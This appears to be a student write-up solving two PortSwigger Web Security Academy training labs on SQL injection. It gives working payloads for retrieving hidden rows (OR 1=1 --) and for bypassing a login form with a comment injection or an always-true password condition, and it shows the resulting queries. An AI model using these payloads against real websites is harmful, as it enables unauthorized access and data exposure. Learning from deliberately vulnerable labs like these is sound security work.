Labs Covered

This write-up focuses on the following APPRENTICE-level labs from the PortSwigger Web Security Academy related to SQL Injection:

1 SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

This lab demonstrates how an attacker can exploit SQL injection in the WHERE clause to extract data that is normally hidden or filtered.

2 SQL injection vulnerability allowing login bypass

This lab shows how SQL injection can be used to bypass authentication mechanisms and gain unauthorized access.

---

LAB 1 - SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

Lab Description

Solution

When the buttons are clicked it is filtered by category,So we navigate to gift:

Query made -

SELECT * FROM products WHERE category = 'Gifts' AND released = 1`

The above is done with a GET request:

Using the following payload Gifts’ – we get 4 items instead of only 3, because it shows both the released and the hidden one:!

To view all the products (both released and not released) , we include Gifts’ OR 1=1 – so that it the condition evaluates to TRUE & displayed all the gifts.

The query looks like

SELECT * FROM products WHERE category = 'Gifts' OR 1=1 --' AND released = 1`

NOTE - URL encode before forwarding the request

---

LAB 2 - SQL injection vulnerability allowing login bypass

Lab Description

Solution

First we login as random user

The login functionality works with a POST request:

Query made -

SELECT * FROM users WHERE username = 'test' AND password = 'test'

To bypass the login, we need to comment out the password part in WHERE clause.

SELECT * FROM users WHERE username = 'administrator5'--' AND password = 'test'

or we can input correct used and make password statment true

SELECT * FROM users WHERE username = 'administrator' AND password = '+or'1'='1

Using the following payload in the password field it is possible to login:

‘+or’1’=’1

Lab is solved